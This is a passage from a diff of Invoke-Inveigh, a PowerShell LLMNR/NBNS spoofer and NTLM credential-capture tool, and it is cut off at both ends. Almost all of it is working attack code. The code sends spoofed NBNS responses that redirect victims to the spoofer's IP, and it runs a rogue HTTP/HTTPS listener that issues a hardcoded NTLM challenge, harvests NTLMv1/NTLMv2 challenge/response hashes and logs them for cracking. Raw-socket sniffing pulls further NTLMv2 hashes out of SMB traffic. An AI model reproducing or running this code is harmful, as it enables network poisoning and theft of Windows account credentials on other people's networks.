(0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,0x00,0x00,0x00,0x05,0x82,0x89,0xa2)` + + $HTTP_challenge_bytes` + + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00)` + + (0x02,0x00,0x06,0x00,0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00)` + + (0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,0x00,0x68,0x00,0x6f,0x00)` + + (0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00)` + + (0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00)` + + $HTTP_timestamp` + + (0x00,0x00,0x00,0x00,0x0a,0x0a) + + $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) + $NTLM = 'NTLM ' + $NTLM_challenge_base64 + $NTLM_challenge = $HTTP_challenge + + Return $NTLM + + } + + while($inveigh.running) + { + $inveigh.context = $inveigh.HTTP_listener.GetContext() + $inveigh.request = $inveigh.context.Request + $inveigh.response = $inveigh.context.Response + $inveigh.message = '' + $NTLM = 'NTLM' + + if($inveigh.request.IsSecureConnection) + { + $HTTP_type = "HTTPS" + } + else + { + $HTTP_type = "HTTP" } - $NBNS_response_message = "- spoofed response has been sent" - } - else - { - Write-Output "NBNS Spoofing Disabled`n" - $NBNS_response_message = "- NBNS spoofing is disabled" - } - - if($HTTP -eq 'y') - { - Write-Output "HTTP Capture Enabled`n" - } - else - { - Write-Output "HTTP Capture Disabled`n" - } - - if($HTTPS -eq 'y') - { - try + + if (($inveigh.request.RawUrl -match '/wpad.dat') -and ($ForceWPADAuth -eq 'n')) { - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.open('ReadWrite') - $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 - $certificate.import($output_directory + "\inveigh.pfx") - $certificate_store.add($certificate) - $certificate_store.close() - Invoke-Expression -command "netsh http add sslcert ipport= certhash=$certificate_thumbprint appid='{00112233-4455-6677-8899-AABBCCDDEEFF}'" > $null - Write-Output "HTTPS Capture Enabled`n" + $inveigh.response.StatusCode = 200 } - catch + else { - $certificate_store.close() - $HTTPS="N" - Write-Output "HTTPS Capture Disabled Due To Certificate Install Error`n" + $inveigh.response.StatusCode = 401 } - } - else - { - Write-Output "HTTPS Capture Disabled`n" + + [string]$authentication_header = $inveigh.request.headers.getvalues('Authorization') + + if($authentication_header.startswith('NTLM ')) + { + $authentication_header = $authentication_header -replace 'NTLM ','' + [byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header) + $inveigh.response.StatusCode = 401 + + if($HTTP_request_bytes[8] -eq 1) + { + $inveigh.response.StatusCode = 401 + $NTLM = NTLMChallengeBase64 + } + elseif($HTTP_request_bytes[8] -eq 3) + { + $NTLM = 'NTLM' + $HTTP_NTLM_offset = $HTTP_request_bytes[24] + $HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes + $HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes + $HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes + + [string]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*' + $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge) + $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(","))+1) + + if($HTTP_NTLM_domain_length -eq 0) + { + $HTTP_NTLM_domain_string = '' + } + else + { + $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_length 0 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes + } + + $HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes + $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes + + $HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes + $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes + + if($HTTP_NTLM_length -eq 24) # NTLMv1 + { + $NTLM_type = "NTLMv1" + $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" + $NTLM_response = $NTLM_response.Insert(48,':') + $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge + + if((($NTLM_challenge -ne '') -and ($NTLM_response -ne '')) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $HTTP_NTLM_user_string.EndsWith('$'))))) + { + $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")]) + $inveigh.NTLMv1_file_queue.add($inveigh.HTTP_NTLM_hash) + $inveigh.NTLMv1_list.add($inveigh.HTTP_NTLM_hash) + $inveigh.console_queue.add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash) + + if($inveigh.file_output) + { + $inveigh.console_queue.add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) + } + } + + if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.repeat)) + { + $inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address + } + } + else # NTLMv2 + { + $NTLM_type = "NTLMv2" + $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" + $NTLM_response = $NTLM_response.Insert(32,':') + $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response + + if((($NTLM_challenge -ne '') -and ($NTLM_response -ne '')) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $HTTP_NTLM_user_string.EndsWith('$'))))) + { + $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.address + "(" + $HTTP_NTLM_host_string + ")")]) + $inveigh.NTLMv2_file_queue.add($inveigh.HTTP_NTLM_hash) + $inveigh.NTLMv2_list.add($inveigh.HTTP_NTLM_hash) + $inveigh.console_queue.add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash) + + if($inveigh.file_output) + { + $inveigh.console_queue.add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) + } + + } + + if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.repeat)) + { + $inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address + } + } + + $inveigh.response.StatusCode = 200 + $NTLM_challenge = '' + + } + else + { + $NTLM = 'NTLM' + } + + } + + [byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message) + $inveigh.response.ContentLength64 = $HTTP_buffer.length + $inveigh.response.AddHeader("WWW-Authenticate",$NTLM) + $HTTP_stream = $inveigh.response.OutputStream + $HTTP_stream.write($HTTP_buffer, 0, $HTTP_buffer.length) + $HTTP_stream.close() } - if($SMB -eq 'y') - { - Write-Output "SMB Capture Enabled`n" - } - else - { - Write-Output "SMB Capture Disabled`n" - } + $inveigh.HTTP_listener.Stop() + $inveigh.HTTP_listener.Close() - if($Repeat -eq 'y') - { - Write-Output "Spoof Repeating Enabled`n" - } - else - { - Write-Output "Spoof Repeating Disabled`n" - } +} - if($ForceWPADAuth -eq 'y') - { - Write-Output "Force WPAD Authentication Enabled`n" - } - else - { - Write-Output "Force WPAD Authentication Disabled`n" - } - - if($Output -eq 0) - { - Write-Output "Console Output Enabled`n" - Write-Output "File Output Enabled`n" - } - elseif($Output -eq 1) - { - Write-Output "Console Output Enabled`n" - Write-Output "File Output Disabled`n" - } - else - { - Write-Output "Console Output Disabled`n" - Write-Output "File Output Enabled`n" - } - - # Write-Output "Output Directory = $output_directory" - # Write-Warning "Press CTRL+C to exit" +# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer +$sniffer_scriptblock = +{ + param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpoofList,$MachineAccounts,$ForceWPADAuth,$RunTime) $byte_in = New-Object Byte[] 4 $byte_out = New-Object Byte[] 4 @@ -257,634 +797,488 @@ function Invoke-Inveigh { $byte_in[1-3] = 0 $byte_out[0] = 1 $byte_out[1-3] = 0 + $inveigh.sniffer_socket = New-Object System.Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::IP) + $inveigh.sniffer_socket.SetSocketOption("IP","HeaderIncluded",$true) + $inveigh.sniffer_socket.ReceiveBufferSize = 1024 + $end_point = New-Object System.Net.IPEndpoint([Net.IPAddress]"$IP", 0) + $inveigh.sniffer_socket.Bind($end_point) + [void]$inveigh.sniffer_socket.IOControl([Net.Sockets.IOControlCode]::ReceiveAll,$byte_in,$byte_out) - $hash = [hashtable]::Synchronized(@{}) - $hash.IP_capture_list = @() - - # Sniffer socket setup - $sniffer_socket = New-Object System.Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork, [Net.Sockets.SocketType]::Raw, [Net.Sockets.ProtocolType]::IP ) - $sniffer_socket.SetSocketOption( "IP", "HeaderIncluded", $true ) - $sniffer_socket.ReceiveBufferSize = 1024000 - $end_point = New-Object System.Net.IPEndpoint( [Net.IPAddress]"$IP", 0 ) - $sniffer_socket.Bind( $end_point ) - [void]$sniffer_socket.IOControl( [Net.Sockets.IOControlCode]::ReceiveAll, $byte_in, $byte_out ) - - Function DataToUInt16( $field ) - { - [Array]::Reverse( $field ) - return [BitConverter]::ToUInt16( $field, 0 ) + if($RunTime) + { + $sniffer_timeout = new-timespan -Minutes $RunTime + $sniffer_stopwatch = [diagnostics.stopwatch]::StartNew() } - Function DataToUInt32( $field ) + while($inveigh.running) { - [Array]::Reverse( $field ) - return [BitConverter]::ToUInt32( $field, 0 ) - } - - Function DataLength - { - param ([int]$length_start,[byte[]]$string_extract_data) - try{ - $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start+1)],0) - } - catch{} - return $string_length - } - - Function DataToString - { - param ([int]$string_length,[int]$string2_length,[int]$string3_length,[int]$string_start,[byte[]]$string_extract_data) - $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length-1)]) - $string_data = $string_data -replace "-00","" - $string_data = $string_data.Split("=") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)} - $string_extract = New-Object System.String ($string_data,0,$string_data.Length) - return $string_extract - } - - # HTTP Server ScriptBlock - $HTTP_scriptblock = - { - - param ($listener,$NTLMv1_out_file,$NTLMv2_out_file,$Repeat,$ForceWPADAuth,$Output) - - while ($listener.IsListening) { - $hash.context = $listener.GetContext() - $hash.request = $hash.context.Request - $hash.response = $hash.context.Response - $hash.message = '' - - if ($hash.request.Url -match '/stop$') #temp fix to shutdown listener - { - $listener.stop() - break - } - - Function DataLength - { - param ([int]$length_start,[byte[]]$string_extract_data) - - try - { - $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start+1)],0) - } - catch{} - - return $string_length - } - - Function DataToString - { - param ([int]$string_length,[int]$string2_length,[int]$string3_length,[int]$string_start,[byte[]]$string_extract_data) - $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length-1)]) - $string_data = $string_data -replace "-00","" - $string_data = $string_data.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)} - $string_extract = New-Object System.String ($string_data,0,$string_data.Length) - return $string_extract - } - - try{ - $NTLM_challenge = '1122334455667788' - $NTLM = 'NTLM' - - if($hash.request.IsSecureConnection) - { - $HTTP_type = "HTTPS" - } - else - { - $HTTP_type = "HTTP" - } - - - if (($hash.request.RawUrl -match '/wpad.dat') -and ($ForceWPADAuth -eq 'n')) - { - $hash.response.StatusCode = 200 - } - else - { - $hash.response.StatusCode = 401 - } - - [string]$authentication_header = $hash.request.headers.getvalues('Authorization') - - if($authentication_header.startswith('NTLM ')) - { - $authentication_header = $authentication_header -replace 'NTLM ','' - [byte[]] $HTTP_request_byte = [System.Convert]::FromBase64String($authentication_header) - $hash.response.StatusCode = 401 - - if ($HTTP_request_byte[8] -eq 1) - { - $NTLM = 'NTLM TlRMTVNTUAACAAAABgAGADgAAAAFgomiESIzRFVmd4gAAAAAAAAAAIIAggA+AAAABgGxHQAAAA9MAEEAQgACAAYATABBAEIAAQAQAEgATwBTAFQATgBBAE0ARQAEABIAbABhAGIALgBsAG8AYwBhAGwAAwAkAGgAbwBzAHQAbgBhAG0AZQAuAGwAYQBiAC4AbABvAGMAYQBsAAUAEgBsAGEAYgAuAGwAbwBjAGEAbAAHAAgApMf4tnBy0AEAAAAACgo=' - $hash.response.StatusCode = 401 - } - elseif ($HTTP_request_byte[8] -eq 3) - { - $NTLM = 'NTLM' - $HTTP_NTLM_offset = $HTTP_request_byte[24] - $HTTP_NTLM_length = DataLength 22 $HTTP_request_byte - $HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_byte - $HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_byte - - if($HTTP_NTLM_domain_length -eq 0) - { - $HTTP_NTLM_domain_string = '' - } - else - { - $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_length 0 0 $HTTP_NTLM_domain_offset $HTTP_request_byte - } - - $HTTP_NTLM_user_length = DataLength 36 $HTTP_request_byte - $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_byte - - $HTTP_NTLM_host_length = DataLength 44 $HTTP_request_byte - $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_byte - - if($HTTP_NTLM_length -eq 24) # NTLMv1 - { - $NTLM_response = [System.BitConverter]::ToString($HTTP_request_byte[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" - $NTLM_response = $NTLM_response.Insert(48,':') - $hash.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge - - if(($Output -eq 0) -or ($Output -eq 1)) - { - $hash.HTTP_NTLM_hash_msg = $(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from " + $hash.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $hash.HTTP_NTLM_hash - } - - if(($Output -eq 0) -or ($Output -eq 2)) - { - # $hash.host.ui.WriteWarningLine("$HTTP_type NTLMv1 challenge/response written to " + $NTLMv1_out_file) - # $hash.HTTP_NTLM_hash |Out-File $NTLMv1_out_file -Append - } - - if (($hash.IP_capture_list -notcontains $hash.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and ($Repeat -eq 'n')) - { - $hash.IP_capture_list += $hash.request.RemoteEndpoint.Address - } - } - else # NTLMv2 - { - $NTLM_response = [System.BitConverter]::ToString($HTTP_request_byte[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" - $NTLM_response = $NTLM_response.Insert(32,':') - $hash.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response - - if(($Output -eq 0) -or ($Output -eq 1)) - { - $hash.HTTP_NTLM_hash_msg = $(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $hash.request.RemoteEndpoint.address + "(" + $HTTP_NTLM_host_string + "):`n" + $hash.HTTP_NTLM_hash - } - - if(($Output -eq 0) -or ($Output -eq 2)) - { - # $hash.host.ui.WriteWarningLine("$HTTP_type NTLMv2 challenge/response written to " + $NTLMv2_out_file) - # $hash.HTTP_NTLM_hash |Out-File $NTLMv2_out_file -Append - } - - if (($hash.IP_capture_list -notcontains $hash.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and ($Repeat -eq 'n')) - { - $hash.IP_capture_list += $hash.request.RemoteEndpoint.Address - } - } - $hash.response.StatusCode = 200 - } - else - { - $NTLM = 'NTLM' - } - - } - [byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($hash.message) - $hash.response.ContentLength64 = $buffer.length - $hash.response.AddHeader("WWW-Authenticate",$NTLM) - $output_stream = $hash.response.OutputStream - $output_stream.write($buffer, 0, $buffer.length) - $output_stream.close() - } - catch{} - } - } - - # HTTP Server - Function Start-HTTP-Server() - { - $listener = New-Object System.Net.HttpListener - - if($HTTP -eq 'y') - { - $listener.Prefixes.Add('http://*:80/') - } - - if(($HTTP -eq 'n') -and ($HTTPS -eq 'y')) - { - $listener.Prefixes.Add('') - } - - if($HTTPS -eq 'y') - { - $listener.Prefixes.Add('https://*:443/') - } - - $listener.AuthenticationSchemes = "Anonymous" - $listener.Start() - $hash.Host = $host - $runspace = [runspacefactory]::CreateRunspace() - $runspace.Open() - $runspace.SessionStateProxy.SetVariable('Hash',$hash) - $powershell = [powershell]::Create() - $powershell.Runspace = $runspace - $powershell.AddScript($HTTP_scriptblock).AddArgument($listener).AddArgument($NTLMv1_out_file).AddArgument($NTLMv2_out_file).AddArgument($Repeat).AddArgument($ForceWPADAuth).AddArgument($Output) > $null - $handle = $powershell.BeginInvoke() - } - - # HTTP Server Start - if(($HTTP -eq 'y') -or ($HTTPS -eq 'y')) - { - Start-HTTP-Server - $web_request = [System.Net.WebRequest]::Create('') # Temp fix for HTTP shutdown - $web_request.Method = "GET" - } - - # Main Sniffer Loop - try - { - while( $true ) - { - try - { - $packet_data = $sniffer_socket.Receive( $byte_data, 0, $byte_data.length, [Net.Sockets.SocketFlags]::None ) - } - catch - {} - - if ($hash.HTTP_NTLM_hash_msg) { - # ignore machine account challenge/rsponse hashes - if(-not ($hash.HTTP_NTLM_hash_msg -like "*`$*")){ - Write-Output $hash.HTTP_NTLM_hash_msg + "`n" - } - $hash.HTTP_NTLM_hash_msg = $Null - } - - $memory_stream = New-Object System.IO.MemoryStream( $byte_data, 0, $packet_data ) - $binary_reader = New-Object System.IO.BinaryReader( $memory_stream ) - + $packet_data = $inveigh.sniffer_socket.Receive($byte_data,0,$byte_data.length,[Net.Sockets.SocketFlags]::None) + + $memory_stream = New-Object System.IO.MemoryStream($byte_data,0,$packet_data) + $binary_reader = New-Object System.IO.BinaryReader($memory_stream) + # IP header fields - $version_HL = $binary_reader.ReadByte( ) - $type_of_service= $binary_reader.ReadByte( ) - $total_length = DataToUInt16 $binary_reader.ReadBytes( 2 ) - $identification = $binary_reader.ReadBytes( 2 ) - $flags_offset = $binary_reader.ReadBytes( 2 ) - $TTL = $binary_reader.ReadByte( ) - $protocol_number = $binary_reader.ReadByte( ) - $header_checksum = [Net.IPAddress]::NetworkToHostOrder( $binary_reader.ReadInt16() ) - $source_IP_bytes = $binary_reader.ReadBytes( 4 ) - $source_IP = [System.Net.IPAddress]$source_IP_bytes - $destination_IP_bytes = $binary_reader.ReadBytes( 4 ) - $destination_IP = [System.Net.IPAddress]$destination_IP_bytes - - $ip_version = [int]"0x$(('{0:X}' -f $version_HL)[0])" - $header_length = [int]"0x$(('{0:X}' -f $version_HL)[1])" * 4 + $version_HL = $binary_reader.ReadByte() + $type_of_service= $binary_reader.ReadByte() + $total_length = DataToUInt16 $binary_reader.ReadBytes(2) + $identification = $binary_reader.ReadBytes(2) + $flags_offset = $binary_reader.ReadBytes(2) + $TTL = $binary_reader.ReadByte() + $protocol_number = $binary_reader.ReadByte() + $header_checksum = [Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16()) + $source_IP_bytes = $binary_reader.ReadBytes(4) + $source_IP = [System.Net.IPAddress]$source_IP_bytes + $destination_IP_bytes = $binary_reader.ReadBytes(4) + $destination_IP = [System.Net.IPAddress]$destination_IP_bytes + $IP_version = [int]"0x$(('{0:X}' -f $version_HL)[0])" + $header_length = [int]"0x$(('{0:X}' -f $version_HL)[1])" * 4 switch($protocol_number) { - 6 { # TCP - $source_port = DataToUInt16 $binary_reader.ReadBytes(2) - $destination_port = DataToUInt16 $binary_reader.ReadBytes(2) - $sequence_number = DataToUInt32 $binary_reader.ReadBytes(4) - $ack_number = DataToUInt32 $binary_reader.ReadBytes(4) - $TCP_header_length = [int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4 - $TCP_flags = $binary_reader.ReadByte() - $TCP_window = DataToUInt16 $binary_reader.ReadBytes(2) - $TCP_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16()) - $TCP_urgent_pointer = DataToUInt16 $binary_reader.ReadBytes(2) - - $payload_data = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length)) - } - 17 { # UDP - $source_port = $binary_reader.ReadBytes(2) - $source_port_2 = DataToUInt16 ($source_port) - $destination_port = DataToUInt16 $binary_reader.ReadBytes(2) - $UDP_length = $binary_reader.ReadBytes(2) - $UDP_length_2 = DataToUInt16 ($UDP_length) - [void]$binary_reader.ReadBytes(2) - - $payload_data = $binary_reader.ReadBytes(($UDP_length_2 - 2) * 4) - } - } - - # Incoming packets - switch ($destination_port) - { - 137 { # NBNS - if($payload_data[5] -eq 1) - { - try - { - $UDP_length[0] += 16 - [Byte[]] $NBNS_response_data = $payload_data[13..$payload_data.length] - $NBNS_response_data += (0x00,0x00,0x00,0xa5,0x00,0x06,0x00,0x00) - $NBNS_response_data += ([IPAddress][String]([IPAddress]$SpooferIP)).GetAddressBytes() - $NBNS_response_data += (0x00,0x00,0x00,0x00) - - [Byte[]] $NBNS_response_packet = (0x00,0x89) - $NBNS_response_packet += $source_port[1,0] - $NBNS_response_packet += $UDP_length[1,0] - $NBNS_response_packet += (0x00,0x00) - $NBNS_response_packet += $payload_data[0,1] - $NBNS_response_packet += (0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20) - $NBNS_response_packet += $NBNS_response_data - - $send_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::Udp ) - $send_socket.SendBufferSize = 1024 - $destination_point = New-Object Net.IPEndpoint( $source_IP, $source_port_2 ) - - $NBNS_query_type = [System.BitConverter]::ToString($payload_data[43..44]) - - switch ($NBNS_query_type) - { - '41-41' { - $NBNS_query_type = '00' - } - '41-44' { - $NBNS_query_type = '03' - } - '43-41' { - $NBNS_query_type = '20' - } - '42-4C' { - $NBNS_query_type = '1B' - } - '42-4D' { - $NBNS_query_type = '1C' - } - '42-4E' { - $NBNS_query_type = '1D' - } - '42-4F' { - $NBNS_query_type = '1E' - } - } - - if($NBNS -eq 'y') - { - if ($NBNSTypes -contains $NBNS_query_type) - { - if ($hash.IP_capture_list -notcontains $source_IP) - { - [void]$send_socket.sendTo( $NBNS_response_packet, $destination_point ) - $send_socket.Close( ) - $NBNS_response_message = "- spoofed response has been sent" - } - else - { - $NBNS_response_message = "- spoof suppressed due to previous capture" - } - } - else - { - $NBNS_response_message = "- spoof not sent due to disabled type" - } - } - - $NBNS_query = [System.BitConverter]::ToString($payload_data[13..$payload_data.length]) - $NBNS_query = $NBNS_query -replace "-00","" - $NBNS_query = $NBNS_query.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)} - $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length) - $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA")) - - $NBNS_query_string_subtracted = "" - $NBNS_query_string = "" - $n = 0 - do - { - $NBNS_query_string_sub = (([byte][char]($NBNS_query_string_encoded.Substring($n,1)))-65) - $NBNS_query_string_subtracted += ([convert]::ToString($NBNS_query_string_sub,16)) - $n += 1 - } - until($n -gt ($NBNS_query_string_encoded.Length - 1)) - $n = 0 - do - { - $NBNS_query_string += ([char]([convert]::toint16($NBNS_query_string_subtracted.Substring($n,2),16))) - $n += 2 - } - until($n -gt ($NBNS_query_string_subtracted.Length - 1)) - - if(($Output -eq 0) -or ($Output -eq 1)) - { - if ((-not ($NBNS_response_message.toString() -like "*NBNS spoofing is disabled")) -and (-not ($NBNS_response_message.toString() -like "spoof not sent due to disabled type"))) { - Write-Output "$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message`n" - } - } - - if(($Output -eq 0) -or ($Output -eq 2)) - { - # "$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message" |Out-File $log_out_file -Append - } - - } - catch{} - } - } - 445 { # SMB - if($SMB -eq 'y') - { - # SMB versions - if ($payload_data[4] -eq 255) - { - $smb_version_offset = 0 - $NTLMv1_string_start = 147 - $NTLMv2_string_start = 151 - } - else - { - $smb_version_offset = 34 - $NTLMv1_string_start = 163 - $NTLMv2_string_start = 167 - } - - if (($payload_data[(87 + $smb_version_offset)] -eq 3) -and ($payload_data[(88 + $smb_version_offset)..(90 + $smb_version_offset)] -eq 0)) - { - $NTLMv2_offset = $payload_data[(103 + $smb_version_offset)] + (79 + $smb_version_offset) - - $NTLMv2_length = DataLength (101 + $smb_version_offset) $payload_data - $NTLMv2_domain_length = DataLength (107 + $smb_version_offset) $payload_data - $NTLMv2_domain_string = DataToString $NTLMv2_domain_length 0 0 ($NTLMv2_string_start + $smb_version_offset) $payload_data - - $NTLMv2_user_length = DataLength (115 + $smb_version_offset) $payload_data - $NTLMv2_user_string = DataToString $NTLMv2_user_length $NTLMv2_domain_length 0 ($NTLMv2_string_start + $smb_version_offset) $payload_data - - $NTLMv2_host_length = DataLength (123 + $smb_version_offset) $payload_data - $NTLMv2_host_string = DataToString $NTLMv2_host_length $NTLMv2_user_length $NTLMv2_domain_length ($NTLMv2_string_start + $smb_version_offset) $payload_data + 6 + { # TCP + $source_port = DataToUInt16 $binary_reader.ReadBytes(2) + $destination_port = DataToUInt16 $binary_reader.ReadBytes(2) + $sequence_number = DataToUInt32 $binary_reader.ReadBytes(4) + $ack_number = DataToUInt32 $binary_reader.ReadBytes(4) + $TCP_header_length = [int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4 + $TCP_flags = $binary_reader.ReadByte() + $TCP_window = DataToUInt16 $binary_reader.ReadBytes(2) + $TCP_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16()) + $TCP_urgent_pointer = DataToUInt16 $binary_reader.ReadBytes(2) + $payload_bytes = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length)) - $NTLMv2_response = [System.BitConverter]::ToString($payload_data[$NTLMv2_offset..($NTLMv2_offset + $NTLMv2_length - 1)]) -replace "-","" - $NTLMv2_response = $NTLMv2_response.Insert(32,':') - $NTLMv2_hash = $NTLMv2_user_string + "::" + $NTLMv2_domain_string + ":" + $NTLM_challenge + ":" + $NTLMv2_response - - if(($Output -eq 0) -or ($Output -eq 1)) - { - Write-Output "$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLMv2_host_string):`n$ntlmv2_hash`n" - } - - if(($Output -eq 0) -or ($Output -eq 2)) - { - # write-warning "SMB NTLMv2 challenge/response written to $NTLMv2_out_file" - # $NTLMv2_hash |Out-File $NTLMv2_out_file -Append - } - - if (($hash.IP_capture_list -notcontains $source_IP) -and (-not $NTLMv2_user_string.EndsWith('$')) -and ($Repeat -eq 'n')) - { - 